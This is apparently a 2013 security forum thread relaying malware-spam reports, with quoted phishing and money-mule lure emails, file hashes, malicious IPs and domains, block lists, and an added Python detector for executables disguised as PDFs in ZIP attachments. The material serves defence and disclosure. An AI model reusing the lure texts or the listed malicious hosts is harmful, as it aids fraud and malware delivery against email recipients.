Attached is a ZIP file which in this case is called -2322693863-6422657608-20130705409306-09249.zip (with a VirusTotal detection rate of 6/48*) which in turn contains a malicious executable fax-report.exe which has an icon that makes it look like a PDF file and has a VirusTotal detection rate of 4/48**.
> http://1.bp.blogspot.com/-riDinrvAIZ8/Up5qPTdSDVI/AAAAAAAACTM/5XIcLTSsYks/s1600/fax-report.png
Automated analysis tools... show an attempted communication with tuhostingprofesional .net on 188.121.51.69 (GoDaddy, Netherlands) which contains about 8 legitimate domains which may or may not have been compromised."
* https://www.virustotal.com/en/file/a675bb8d8d32d11a1262abde0250616908fd79cbedde9f11e339597c760e9e1b/analysis/1386113630/

** https://www.virustotal.com/en/file/31cd9cd01c86abacdb78c5277bec57464b51a95533084a937b0666007b318dc4/analysis/1386113237/
___

Fake Fax/Voice SPAM - malicious attachment
- http://blog.mxlab.eu/2013/12/03/email-faxnachricht-von-unknown-an-03212-1298305-contains-trojan/
Dec 3, 2013 - "... new trojan distribution campaign by email with the subject “Faxnachricht von unknown an 03212-1298305″. This email is sent from the spoofed address “”WEB.DE Fax und Voice” <fax-021213-voice@webde.de>” and has the following very short body:
Fax und Voice
The attached ZIP file has the name WEB.DE Fax und Voice.zip and contains the 120 kB large file WEB.DE Fax und Voice.exe. The trojan is known as TR/Dropper.VB.3500, Virus.Win32.Heur.p, Trojan.Packed.25042, Win32/TrojanDownloader.Wauchos.X, PE:Trojan.VBInject!1.64FE or Troj/Agent-AFAX. At the time of writing, 15 of the 48 AV engines did detect the trojan at Virus Total. Use the Virus Total permalink* and Malwr permalink** for more detailed information."
SHA256: 8d2fe8b6c370c0568f93bb4eee838dc4514f2cc5578424b7376ed21e4ca9091b
* https://www.virustotal.com/en/file/8d2fe8b6c370c0568f93bb4eee838dc4514f2cc5578424b7376ed21e4ca9091b/analysis/

** https://malwr.com/analysis/ZWMxYjQ3YWEyNzY0NGVlNjgyMWVkNzI5OGUwZmEwZGQ/
___

Fake Mastercard SPAM - malicious attachment
- http://blog.mxlab.eu/2013/12/03/important-notification-for-a-mastercard-holder-with-trojan-disguised-as-email-from-mastercard/
Dec 3, 2013 - "... trojan distribution campaign appears with more or less the same layout in the email that targets Mastercard holders with the subject “Important notification for a Mastercard holder”. MX Lab... intercepted these emails that are sent from the spoofed address “MasterCard” and have the following body:
Important notification for a Mastercard holder!
Your Bank debit card has been temporarily blocked
We’ve detected unusual activity on your Bank debit card . Your UK Bank debit card has been temporarily blocked, please fill document in attachment and contact us
About MasterCard Global Privacy Policy Copyright Terms of Use
© 1994-2013 MasterCard

Screenshot: http://img.blog.mxlab.eu/2013/20131203_mastercard.gif

The attached ZIP file has the name MasterCard_D77559FFA7.zip and contains the 131 kB large file MasterCard_info_pdf_34857348957239509857928472389469812364912034237412893476812734.pdf.exe. The trojan is known as PasswordStealer.Fareit, Trojan-PWS/W32.Tepfer.131072.HS, PE:Malware.Obscure/Huer!1.9E03, Troj/Agent-AFAZ or Trojan.DownLoader9.22851. At the time of writing, 12 of the 48 AV engines did detect the trojan at Virus Total. Use the... Malwr permalink* for more detailed information."
* https://malwr.com/analysis/Yjk0NjczNDAyMDZlNDMzMDk4NjU5NGQzOGQyNGM0OTU/
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Fax and Voice Notification Email Messages - 2013 Dec 03
Fake Purchase Order Request Email Messages - 2013 Dec 03
Fake Payment Confirmation Notification Email Messages - 2013 Dec 03
Fake Shipping Order Information Email Messages - 2013 Dec 03
Fake Product Inquiry Email Messages - 2013 Dec 03
Fake Product Purchase Order Email Messages - 2013 Dec 03
Fake Meeting Invitation Email Messages - 2013 Dec 03
Fake Fax Message Delivery Email Messages - 2013 Dec 03
Fake Failed Delivery Notification Email Messages - 2013 Dec 03
Malicious Personal Pictures Attachment Email Messages - 2013 Dec 03
Fake Payment processing Notification Email Messages - 2013 Dec 03
Fake Unpaid Debt Invoice Email Messages - 2013 Dec 03
Email Messages with Malicious Attachments - 2013 Dec 03
Fake Product Order Quotation Email Messages - 2013 Dec 03
Fake Payroll Invoice Notification Email Messages - 2013 Dec 03
Email Messages with Malicious Attachments - 2013 Dec 03
Fake Financial Document Email Messages - 2013 Dec 03
(More detail and links at the cisco URL above.)

:fear: :mad:

AplusWebMaster
2013-12-04, 13:36
FYI...

Fake Amazon SPAM - malicious attachment
- http://blog.mxlab.eu/2013/12/04/amazon-order-details-email-with-attached-order-details-zip-contains-trojan/
Dec 4, 2013 - "... new trojan distribution campaign by email with the subject “order #852-9045074-5639529 or “order ID801-7322179-4122684". This email is sent from the spoofed address “”AMAZON.CO.UK” <SALES@ AMAZON .CO .UK>” and has the following body:
Good evening,
Thank you for your order. We’ll let you know once your item(s) have dispatched.You can view the status of your order or make changes to it by visiting Your Orders on Amazon.co.uk.
Order Details
Order ID266-3050394-3760006 Placed on December 2, 2013
Order details and invoice in attached file.
Need to make changes to your order? Visit our Help page for more information and video guides.
We hope to see you again soon. Amazon.co.uk

The attached ZIP file has the name Order details.zip and contains the 86 kB large file Order details.exe. The trojan is known as Trojan-PWS.Fareit, Trojan.Inject.RRE, PE:Malware.FakeDOC@CV!1.9C3C or Mal/Generic-S. At the time of writing, 5 of the 46 AV engines did detect the trojan at Virus Total. Use the Virus Total permalink* and Malwr permalink** for more detailed information.
SHA256: 0cb39edbc66388a3315b84e0aa9f95b9e58ce4aab3e3e188ba0537694956afbc."
* https://www.virustotal.com/en/file/0cb39edbc66388a3315b84e0aa9f95b9e58ce4aab3e3e188ba0537694956afbc/analysis/1386150729/

** https://malwr.com/analysis/YTk5MDIzNzM1OTJiNDAwOWExODFhMzYzNDlhY2ZhY2Q/

79.187.164.155 - PL
- https://www.virustotal.com/en/ip-address/79.187.164.155/information/

- http://blogs.appriver.com/Blog/bid/100278/Just-In-Time-for-the-Holidays
Dec 03, 2013 - "... floods of -fake- Amazon.com "Order Details" notifications are hitting our filters... They are out in full force."
Screenshot: http://blogs.appriver.com/Portals/53864/images/Amazon-resized-600.png
___

Fake Amazon.co.uk SPAM / Order details.zip
- http://blog.dynamoo.com/2013/12/fake-amazoncouk-spam-order-detailszip.html
4 Dec 2013 - "This -fake- Amazon spam comes with a malicious attachment:
Date: Wed, 4 Dec 2013 11:07:00 +0200 [04:07:00 EST]
From: "AMAZON.CO.UK" [SALES@ AMAZON .CO .UK]
Subject: order ID718-4116431-2424056
Good evening, Thanks for your order. We'll let you know once your item(s) have dispatched.You can check the status of your order or make changes to it by visiting Your Orders on Amazon.co.uk.
Order Details
Order ID757-7743075-1612424 Placed on December 1, 2013 Order details and invoice in attached file.
Need to make changes to your order? Visit our Help page for more information and video guides.
We hope to see you again soon. Amazon. co .uk

Attached is a ZIP file Order details.zip which in turn contains a malicious executable Order details.exe which has a VirusTotal detection rate of 15/49*. Automated analysis tools... are fairly inconclusive, but do show some apparent traffic to 79.187.164.155 (TP, Poland) plus the creation of a key HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Start WingMan Profiler to run the malware at startup."
* https://www.virustotal.com/en-gb/file/0cb39edbc66388a3315b84e0aa9f95b9e58ce4aab3e3e188ba0537694956afbc/analysis/1386166395/
___

Fake Royal Mail SPAM - malicious attachment
- http://blog.mxlab.eu/2013/12/04/newer-version-of-fake-email-from-royal-mail-regarding-detained-package/
Dec 4, 2013 - "... Today’s campaign is slightly different and carrying a new variant of the trojan. This email is sent from the spoofed address “RoyalMail Notification”, the SMTP from address on server level is now noreply@ royalmail .com, the subject has changed to “ATTN: Lost / Missing package” and has the following body:
Mail – Lost / Missing package – UK Customs and Border Protection
Royal Mail has detained your package for some reason (for example, lack of a proper invoice, bill of sale, or other documentation, a possible trademark violation, or if the package requires a formal entry) the RM International Mail Branch holding it will notify you of the reason for detention (in writing) and how you can get it released.
Please fulfil the documents attached.

Screenshot: http://img.blog.mxlab.eu/2013/20131202_royalmail.gif

The attached ZIP file has the name RoyalMail_ID_D6646FD113.zip and contains the 82 kB large file Royal-Mail_Report_03485734895374895637249865238746532649573245.pdf. The trojan is known as TR/Crypt.Xpack.32532, Trojan.DownLoader9.22851, Trojan.Win32.Inject (A), Trojan.Win32.Inject.gtgw, PWSZbot-FMU!4948180CFBA9, Trojan.Agent.ED or Troj/DwnLdr-LEX. This executable will create a process on an infected system, modify the Windows registry, change the firewall policies, install itself to run when booting the system; it can steal information from local internet browsers, harvest credentials from FTP clients, collect information to fingerprint the system, perform HTTP requests and start servers listening on 0.0.0.0 on port 6274, 0.0.0.0 on port 2865 and 0.0.0.0 on port 0 (note that the ports in use have changed in this new variant).
At the time of writing, 8 of the 47 AV engines did detect the trojan at Virus Total. Use the Virus Total permalink* and Malwr permalink** for more detailed information.
SHA256: 36edcd915f489fcac41d9a8db210db74fb35ccb03c4b86575f0bfa55a8655d66.
UPDATE: The message now comes with subject “Warning: Lost/Missing package” and contains the file RoyalMail_Report_IDEEAA87302A.zip. Once extracted the file Royal_report_4935865497637856239875696597694892346545692354.pdf.exe is available. At the time of writing, 3 of the 49 AV engines did detect the trojan at Virus Total.
Use the Virus Total permalink*** or Malwr permalink**** for more detailed information.
SHA256: 1c264ebf37829848920221b067ef13ad90968b332c91cc04a5f58cb9a0dcc4db."
* https://www.virustotal.com/en/file/36edcd915f489fcac41d9a8db210db74fb35ccb03c4b86575f0bfa55a8655d66/analysis/1386160116/

** https://malwr.com/analysis/MjNjZTZjMzA3YTI4NGI2MmI2NTI3MjRhYzYyN2FkYWY/

*** https://www.virustotal.com/en/file/1c264ebf37829848920221b067ef13ad90968b332c91cc04a5f58cb9a0dcc4db/analysis/1386167663/

**** https://malwr.com/analysis/YTI1YmQxZDk1OTRmNGE5OTg3ZjhmNjkzYzg3N2I4OWE/
___

Fake Dept of Treasury SPAM / FMS-Case.exe
- http://blog.dynamoo.com/2013/12/department-of-treasury-notice-of.html
4 Dec 2013 - "This spam says Salesforce.com at the top but the rest is allegedly from some US Government department or other (pay attention people!). Anyway, it has a malicious attachment.
Date: Wed, 4 Dec 2013 08:24:02 -0500 [08:24:02 EST]
From: "support@salesforce.com" [support@ salesforce .com]
Subject: Department of Treasury Notice of Outstanding Obligation - Case CWK8SSU4K6CN852
Important please review and sign the attached document!
We have received notification from the Department of the Treasury,
Financial Management Service (FMS) that you have an outstanding
obligation with the Federal Government that requires your immediate
attention.
In order to ensure this condition does not affect any planned
contract or grant activity, please review and sign the attached document and if
you are unable to understand the attached document please call FMS at 1-800-304-3107
to address this issue. Please make sure the person making the telephone call has the
Taxpayer Identification Number available AND has the authority/knowledge
to discuss the debt for the contractor/grantee.
Questions should be directed to the Federal Service Desk ...

Attached is a file FMS-Case-CWK8SSU4K6CN852.zip which in turn contains a malicious executable FMS-Case.exe which has a VirusTotal detection rate of 7/49*. Automated analysis tools... show an attempted connection to worldofchamps .com on 198.1.78.171 (Websitewelcome, US) and a download from [donotclick]deshapran .com/img/deshp.exe on 182.18.143.140 (Pioneer eLabs, India). This second part has a VirusTotal detection rate of 6/47**, although automated analysis tools are inconclusive***. I recommend blocking -both- those domains."
* https://www.virustotal.com/en-gb/file/3822905181974a0e22aae2707b1d12b08053b7c988c46a84a57290dcb4574c40/analysis/1386170174/

** https://www.virustotal.com/en-gb/file/a4c4a0cd70470584469c91caed5b803957d0681cf4f91f87f5be77e53b1182bb/analysis/1386170947/

*** https://malwr.com/analysis/NWJmNGQyNjRmMjIyNDFiNTllMzU3ZTE0MTlmMDU0NTY/
___

Job SCAMS - "british-googleapps .com" (and other googleapps .com domains)
- http://blog.dynamoo.com/2013/12/british-googleappscom-and-other.html
4 Dec 2013 - "This following spam email is attempting to recruit money mules:
From: arwildcbrender@ victimdomain .com
to: arwildcbrender@ victimdomain .com
date: 4 December 2013 07:49
subject: Employment you've been searching!
Hello, We have an excellent opportunity for an apprentice applicant to join a rapidly expanding company.
An at home Key Account Manager Position is a great opportunity for stay at home parents
or anyone who wants to work in the comfort of their own home.
This is a part time job / flexible hrs for European citizens only,This is in view of our not having a branch office presently in Europe,
also becouse of paypal and ebay policies wich is prohibit to work directly with residents of some countries.
Requirements: computer with Internet access, valid email address, good typing skills.
If you fit the above description and meet the requirements, please apply to this ad stating your location.
You will be processing orders from your computer. How much you earn is up to you.
The average is in the region of 750-1000 GBP per week, depending on whether you work full or part time.
Region: United Kingdom only.
If you would like more information, please contact us stating where you are located and our job reference number - 42701-759/3HR.
Please only SERIOUS applicants.
If you are interested, please reply to: Gene@british-googleapps .com

Sample subjects include:
Employment you've been searching!
Career opportunity inside
Job ad - see details! Sent through Search engine...
british-googleapps .com is registered with completely fake details and uses a mail server on 50.194.47.186 (Comcast Business, US) to process mail. There are several other similar domain names being used for the same scam... In addition to those, all these following IPs and domains are in use by the scammers either now or recently. All the domains are registered through scam-friendly Chinese registrar BIZCN to fictitious registrants.
50.194.47.186 - US
175.67.90.27 - CN
95.94.135.113 - PT
220.67.126.175 - KR ..."
(Many URLs listed at the dynamoo URL above.)

:mad: :fear:
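A gateway-side triage of the ZIP lures described in the MasterCard, Amazon and Royal Mail reports above (a .pdf.exe double extension, PE content behind a .pdf name, a 40+ digit "report number" in the file name), as an added example; it is not code from dynamoo, MX Lab or the forum poster, and the sample ZIPs are constructed in memory around a harmless MZ stub, not real malware.

```python
"""Triage ZIP e-mail attachments for executables dressed up as documents.
Added example; the rules and sample files below are constructed from the
attachment names quoted in the posts above, nothing is downloaded."""
import io
import re
import zipfile

# Extensions Windows will execute on double-click, whatever icon the file shows.
EXECUTABLE_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}
# Document extensions the lures imitate ("..._pdf_....pdf.exe", "Report_....pdf").
DOCUMENT_EXT = {".pdf", ".doc", ".docx", ".xls", ".txt"}
PE_MAGIC = b"MZ"          # DOS header of every Windows executable
PDF_MAGIC = b"%PDF"       # what a real PDF starts with
LONG_DIGIT_RUN = re.compile(r"\d{20,}")  # the absurdly long fake reference numbers


def _extensions(name):
    """All dotted suffixes of a file name, lower-cased: 'a.pdf.exe' -> ['.pdf', '.exe']."""
    parts = name.rsplit("/", 1)[-1].lower().split(".")
    return ["." + p for p in parts[1:]] if len(parts) > 1 else []


def triage_member(name, head):
    """Return the list of reasons one ZIP member looks like a lure (empty = clean).
    `head` is the first few bytes of the member, enough for the magic checks."""
    reasons = []
    exts = _extensions(name)
    last = exts[-1] if exts else ""
    if last in EXECUTABLE_EXT:
        reasons.append("executable member %s" % last)
    if len(exts) >= 2 and exts[-2] in DOCUMENT_EXT and last in EXECUTABLE_EXT:
        reasons.append("double extension %s%s" % (exts[-2], last))
    if head.startswith(PE_MAGIC) and last not in EXECUTABLE_EXT:
        # Royal-Mail_Report_....pdf: PE content behind a document extension.
        reasons.append("PE header behind non-executable extension %s" % (last or "(none)"))
    if LONG_DIGIT_RUN.search(name):
        reasons.append("long digit run in name")
    return reasons


def triage_zip(zip_bytes):
    """Inspect every member of a ZIP attachment.
    Returns {member_name: [reasons]} for members that trip at least one rule."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(8)  # only the magic bytes are needed
            reasons = triage_member(info.filename, head)
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_zip(members):
    """Build an in-memory ZIP from {name: bytes}; used to construct the samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed samples modelled on the attachment names in the posts above.
FAKE_PE = b"MZ" + b"\x00" * 62          # a bare DOS header, not an executable
FAKE_PDF = b"%PDF-1.4\n% constructed benign document\n"

SAMPLE_MASTERCARD = build_zip({
    "MasterCard_info_pdf_34857348957239509857928472389469812364912034237412893476812734.pdf.exe": FAKE_PE})
SAMPLE_ROYALMAIL = build_zip({
    "Royal-Mail_Report_03485734895374895637249865238746532649573245.pdf": FAKE_PE})
SAMPLE_AMAZON = build_zip({"Order details.exe": FAKE_PE})
SAMPLE_BENIGN = build_zip({"invoice-2013-12.pdf": FAKE_PDF})

if __name__ == "__main__":
    for label, blob in [("mastercard", SAMPLE_MASTERCARD), ("royalmail", SAMPLE_ROYALMAIL),
                        ("amazon", SAMPLE_AMAZON), ("benign", SAMPLE_BENIGN)]:
        print(label, triage_zip(blob) or "clean")
```

The magic check is what catches the Royal Mail variant, whose member name ends in .pdf with no executable extension at all.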

AplusWebMaster
2013-12-05, 14:37
FYI...

Bogus Firefox and Media Player downloads - 89.248.164.219 and 217.23.2.233
- http://blog.dynamoo.com/2013/12/something-unpleasant-on-89248164219-and.html
5 Dec 2013 - "The IPs 89.248.164.219 (Ecatel, Netherlands) and 217.23.2.233 (Worldstream, Netherlands) appear to be hosting some sort of -bogus- Firefox* and Media Player** downloads. (You can see the VirusTotal reports here*** and here****). All the domains in use appear at first glance to be genuine but are basically some sort of typosquatting. A full list of all the subdomains I can find are at the end of the blog, but in the meantime I recommend using the following blocklist:
89.248.164.219
217.23.2.233 ..."
(Long list of URLs at the dynamoo URL above.)
* http://urlquery.net/report.php?id=8165658

** http://urlquery.net/report.php?id=8165615

*** https://www.virustotal.com/en-gb/ip-address/89.248.164.219/information/

**** https://www.virustotal.com/en-gb/ip-address/217.23.2.233/information/

Bogus Browser Update ...
- http://www.webroot.com/blog/2013/12/05/compromised-legitimate-web-sites-expose-users-malicious-javasymbianandroid-browser-updates/
Dec 5, 2013 - "... a currently active malicious campaign, relying on redirectors placed at compromised/hacked legitimate Web sites, for the purpose of hijacking the legitimate traffic and directly exposing it to multi mobile OS based malicious/fraudulent content. In this particular case, a -bogus- “Browser Update“, which in reality is a premium rate SMS malware.
Sample screenshot of the landing page upon automatic redirection:
> https://www.webroot.com/blog/wp-content/uploads/2013/12/Compromised_Sites_Traffic_Exchange_Android_Java_Symbian_Malware_Fake_Browser_Update.png
Landing page upon redirection: hxxp ://mobleq .com/e/4366
Domain name reconnaissance: mobleq .com – 91.202.63.75 ...
Detection rates for the multi mobile platform variants:
MD5: a4b7be4c2ad757a5a41e6172b450b617 – * HEUR:Trojan-SMS.AndroidOS.Stealer.a
MD5: 1a2b4d6280bae654ee6b9c8cfe1204ab – ** Java.SMSSend.780; TROJ_GEN.F47V1117
MD5: 2ff587ffb2913aee16ec5cae7792e2a7 – *** ..."
* https://www.virustotal.com/en/file/22278cc82c79d1ea4328d633b9f935db3020e626ade7c77a889d36e1b3b19fce/analysis/

** https://www.virustotal.com/en/file/62ec89a0f6c8f6cd047705793a3fc9818adb5c7f3a098d472bc0b0c4c6a4ee03/analysis/1386176451/

*** https://www.virustotal.com/en/file/7bbe99439e2f50e647c9178343af4b2e8ebec4630fd739e38e2f46e1c7e37bac/analysis/1386176560/

- https://www.virustotal.com/en/ip-address/91.202.63.75/information/
___

Something evil on 192.95.1.190
- http://blog.dynamoo.com/2013/12/something-evil-on-192951190.html
5 Dec 2013 - "It looks like there is some sort of exploit kit on 192.95.1.190 (OVH, Canada) [example*] spreading through injection attacks although at the moment I can't reproduce the issue. In any case, I would recommend -blocking- that IP... Some of the subdomains in use are listed here**..."
(More dot biz URLs listed at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/url/e90cdfb1a187b78997e573ab9fee90442b45c6a95b4281f5f185e458161a79f3/analysis/

** http://pastebin.com/JREzW6vm

- https://www.virustotal.com/en/ip-address/192.95.1.190/information/

:fear::fear: :mad:

AplusWebMaster
2013-12-09, 19:06
FYI...

Malware sites to block 9/12/2013
- http://blog.dynamoo.com/2013/12/malware-sites-to-block-9122013.html
9 Dec 2013 - "These malicious sites and IPs are related to this attack (thanks to the folks at ThreatTrack Security for the tip). Although a lot of the sites are not currently resolving, those that are up are hosted on 37.59.254.224 and 37.59.232.208 which are a pair of OVH IPs suballocated to:
organisation: ORG-RL152-RIPE
org-name: R5X .org ltd
org-type: OTHER
address: Krasnoselskaja 15-219
address: 346579 Moscow
address: RU
abuse-mailbox: abuse@ r5x .org
mnt-ref: OVH-MNT
mnt-by: OVH-MNT
source: RIPE # Filtered
R5X .org IPs have featured a couple of times before here [1] [2] so I would suggest -blocking- any that you find. I'll do some research on those soon, but in the meantime I would recommend blocking the following IPs and domains. Domains that are already flagged by Google are highlighted.
37.59.232.208/28
37.59.254.224/28 ..."
(Many URLs listed at the dynamoo URL above.)
[1] http://blog.dynamoo.com/2013/09/6rfnet-and-something-evil-on.html

[2] http://blog.dynamoo.com/2012/08/something-evil-on-1786319512826.html

- http://google.com/safebrowsing/diagnostic?site=AS:16276
"... over the past 90 days, 4217 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-12-09, and the last time suspicious content was found was on 2013-12-09..."
___

Fake Billing Invoice malware spam
- http://blog.dynamoo.com/2013/12/tnt-uk-limited-self-billing-invoice.html
9 Dec 2013 - "This fairly terse spam email comes with a malicious attachment:
Date: Mon, 9 Dec 2013 20:32:19 +0800 [07:32:19 EST]
From: Accounts Payable TNT [accounts.payable@ tnt .co .uk]
Subject: TNT UK Limited Self Billing Invoice 5321378841
Download the attachment. Invoice will be automatically shown by double click.

Attached is an archive file called TNT UK Self Billing Invoice.zip (VirusTotal detection rate 6/49*) which in turn contains a malicious executable TNT UK Self Billing Invoice.exe (detection rate 6/47**) which has an icon that makes it look like a PDF file.
> https://lh3.ggpht.com/-NNMZumhc_ug/UqXfV-JQT3I/AAAAAAAACT0/JbtcZarxowE/s1600/tnt.png
Automated analysis tools... show an attempted connection to 2dlife .com on 5.9.182.220 (JoneSolutions.Com, Philippines). I can see only two domains on this server, the other one being 2dlife .fr so I would assume that both are compromised and blocking access to this IP address is the way to go."
* https://www.virustotal.com/en-gb/file/0c00fb260a368c5d404df7e16184d4bb310c94cd9eb98e9cbe4fe31382a973cf/analysis/1386602037/

** https://www.virustotal.com/en-gb/file/29d1353b9c7a3b705b192f63ffe8def30e3079d02356d59c6f82beecb76da113/analysis/1386602000/

- https://www.virustotal.com/en/ip-address/5.9.182.220/information/
___

Multi-hop iframe campaign - client-side exploit malware
- http://www.webroot.com/blog/2013/12/09/malicious-multi-hop-iframe-campaign-affects-thousands-web-sites-leads-cocktail-client-side-exploits-part-two/
Dec 9, 2013 - "... The campaign is not only still proliferating, but the adversaries behind it have also (logically) switched the actual hosting infrastructure... currently active malicious iframe campaign that continues to serve a cocktail of (patched*) client-side exploits, to users visiting legitimate Web sites... Domain names reconnaissance:
hxxp ://www3.judtn3qyy1yv-4.4pu .com – 188.116.34.246
hxxp ://www1.gtyg4h3.4pu .com – 188.116.34.246
find-and-go .com – 78.47.4.17
... malicious scripts, dropped malicious files..."
(More detail at the webroot URL above.)
* http://www.zdnet.com/blog/security/seven-myths-about-zero-day-vulnerabilities-debunked/7026

- https://www.virustotal.com/en/ip-address/188.116.34.246/information/

:fear: :mad:

AplusWebMaster
2013-12-10, 17:50
FYI...

Evil network: R5X .org / OVH
- http://blog.dynamoo.com/2013/12/evil-network-r5xorg-ovh.html
10 Dec 2013 - "Russian web host R5X .org has featured on this blog a few times before, but I took the opportunity to look at it a little more closely... Out of 300 domains that I found hosted now or recently in R5X .org's space (rented from OVH), 177 (59%) are flagged as malicious by Google, and 230 (77%) are flagged as spam or malware by SURBL. MyWOT ratings indicate that there are no legitimate sites in the IP address ranges I checked. R5X .org doesn't have a network of its own but it rents IPs from OVH. I have identified several small netblocks which I strongly recommend that you -block- although there may be others.
37.59.232.208/28
37.59.254.224/28
46.105.166.68/30
46.105.166.96/30
178.33.208.208/30
192.95.7.8/30
192.95.41.88/29
192.95.46.132/30
198.27.103.204/30
198.27.96.132/30 ...
A list of all the domains I can find, current IP addresses, MyWOT rating, the Google prognosis and SURBL codes can be found here* [csv] else I recommend using the following blocklist:
37.59.232.208/28
37.59.254.224/28
46.105.166.68/30
46.105.166.96/30
178.33.208.208/30
192.95.7.8/30
192.95.41.88/29
192.95.46.132/30
198.27.103.204/30
198.27.96.132/30 ..."
(More detail at the dynamoo URL above.)
* http://www.dynamoo.com/files/r5x-org.csv
___

"EUROPOL" scareware / something evil on 193.169.87.247
- http://blog.dynamoo.com/2013/12/europol-scareware-something-evil-on.html
10 Dec 2013 - "193.169.87.247 ("PE Ivanov Vitaliy Sergeevich", Ukraine) is currently serving up scareware claiming that the victim's PC is -locked- using the following domains:
a1751 .com
b4326 .com
d2178 .com
f1207 .com
h5841 .com
k6369 .com
The -scareware- is multilingual and detects the country that the visitor is calling from. In this case I visited from the UK and got the following:
> http://3.bp.blogspot.com/-J6hJIZ3fRzU/UqcdAZQLanI/AAAAAAAACUI/pBsB0ZBF00E/s1600/europol.png
... The text varies depending on the country the visitor is in... The bad guys use subdomains to obfuscate the domain somewhat, so instead of just getting f1207 .com (for example), you get europol.europe .eu.id176630100-8047697129.f1207 .com instead which looks a little more official. You can see some more examples here*... 193.169.87.247 forms part of 193.169.86.0/23 AS48031 which has a so-so reputation according to Google; it does look like there are a lot of legitimate sites in the neighbourhood as well as these malicious ones.
Recommended blocklist:
193.169.87.247
a1751 .com
b4326 .com
d2178 .com
f1207 .com
h5841 .com
k6369 .com
Update: a similar attack has also taken place on 193.169.86.250 on the same netblock."
* https://www.virustotal.com/en-gb/ip-address/193.169.87.247/information/

- https://www.virustotal.com/en-gb/ip-address/193.169.86.250/information/

- http://google.com/safebrowsing/diagnostic?site=AS:48031
"... over the past 90 days, 206 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-12-09, and the last time suspicious content was found was on 2013-12-09..."
___

Fake Amazon .co.uk order SPAM / AM-ORDER-65HNA1972.exe
- http://blog.dynamoo.com/2013/12/fake-amazoncouk-order-spam-am-order.html
10 Dec 2013 - "This -fake- Amazon spam has a malicious attachment:
Date: Tue, 10 Dec 2013 11:19:03 +0200 [04:19:03 EST]
From: blackjacksxjt@ yahoo .com
Subject: order #822-8266277-7103199
Good evening,
Thank you for your order. We'll let you know once your item(s) have dispatched.You can check the status of your order or make changes to it by visiting Your Orders on Amazon.co.uk.
Order Details
Order #481-0295978-7625805 Placed on December 8, 2013
Order details and invoice in attached file.
Need to make changes to your order? Visit our Help page for more information and video guides.
We hope to see you again soon. Amazon .co .uk

Screenshot: http://techhelplist.com/images/stories/amazon-order-virus-10dec2013.png

Attached is an archive file AM-ORDER-65HNA1972.zip (VirusTotal detections 9/47*) which in turn contains a malicious executable AM-ORDER-65HNA1972.exe (VirusTotal detections 9/49**) which has an icon to make it look like some sort of document.
> https://lh3.ggpht.com/-iL24C02iQD0/Uqc5UVD9uxI/AAAAAAAACUY/mIqo2BZhA4s/s1600/amazon-order.png
Automated analysis tools seem to be timing out... indicating perhaps that it has been hardened against sandbox analysis."
* https://www.virustotal.com/en-gb/file/895ec9342baba173aa0a7583ac548c6647ae833021946a47f532b792ff2fb5a6/analysis/1386690407/

** https://www.virustotal.com/en-gb/file/a1b2ca37ec2e9d0a781a4b21fbb64d8ce76874dbf2ac8d3715b7106afe6eab36/analysis/1386690064/

:fear::fear: :mad:

AplusWebMaster
2013-12-11, 15:42
FYI...

Fake WhatsApp SPAM / IMG003299.zip
- http://blog.dynamoo.com/2013/12/your-friend-has-just-sent-you-pic-spam.html
11 Dec 2013 - "This -fake- WhatsApp message has a malicious attachment.
Date: Wed, 11 Dec 2013 18:29:19 +0700 [06:29:19 EST]
Subject: Your friend has just sent you a pic
Hi!
Your friend has just sent you a photograph in WhatsApp. Open attachments to see what it is.

Screenshot: https://lh3.ggpht.com/-AJQc-jYcGAQ/Uqhm_0JsT9I/AAAAAAAACU4/uu5v94u_a2o/s400/whatsapp.png

Attached to the email is an archive IMG003299.zip (VirusTotal detections 7/43*) which in turn contains a malicious executable IMG003299.exe (VirusTotal detections 9/49**). Automated analysis tools... don't reveal very much about the malware in question however."
* https://www.virustotal.com/en-gb/file/a0b86830e901fd952133622ea6832ce96393c6c700144b5521c7870b1848be5f/analysis/1386767572/

** https://www.virustotal.com/en-gb/file/44e50a568df5633083be84c9dcc82f37a22fa3cedc1d1c50c06e0fe9065f6793/analysis/1386767585/
___

Fake Wells Fargo SPAM / WF_Docs_121113.exe
- http://blog.dynamoo.com/2013/12/wells-fargo-spam-wfdocs121113exe.html
11 Dec 2013 - "This fake Wells Fargo spam has a malicious attachment:
Date: Wed, 11 Dec 2013 17:03:26 +0100 [11:03:26 EST]
From: Kerry Pettit [Kerry.Pettit@ wellsfargo .com]
Subject: FW: Important docs
We have received this documents from your bank, please review attached documents.
Kerry Pettit
Wells Fargo Accounting
817-295-1849 office
817-884-0882 cell Kerry.Pettit@ wellsfargo .com
Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE ...

Attached to the email is a ZIP file starting with WF_Docs_ and ending with the first part of the recipient's email address, inside that is a ZIP file with the date encoded into the filename WF_Docs_121113.exe. VirusTotal detections for the ZIP are 6/49* and are 6/47** for the EXE.
Automated analysis... shows an attempted connection to hortonnovak .com on 194.28.87.121 (Hostpro, Ukraine). There is only one site that I can see on this IP, so I would recommend blocking one or the other or -both- of them."
* https://www.virustotal.com/en-gb/file/9d46d60ffbb6e69a73252716c9291009ee3d31b9cfb83911d8b9df3a56db35d6/analysis/1386779806/

** https://www.virustotal.com/en-gb/file/75576d28bbe0f815bc7333696df3646a79edf229e952aac83213754f206cdb79/analysis/1386779808/

- https://www.virustotal.com/en/ip-address/194.28.87.121/information/
___

Facebook Phishing and Malware via Tumblr redirects
- https://isc.sans.edu/diary/Facebook+Phishing+and+Malware+via+Tumblr+Redirects/17207
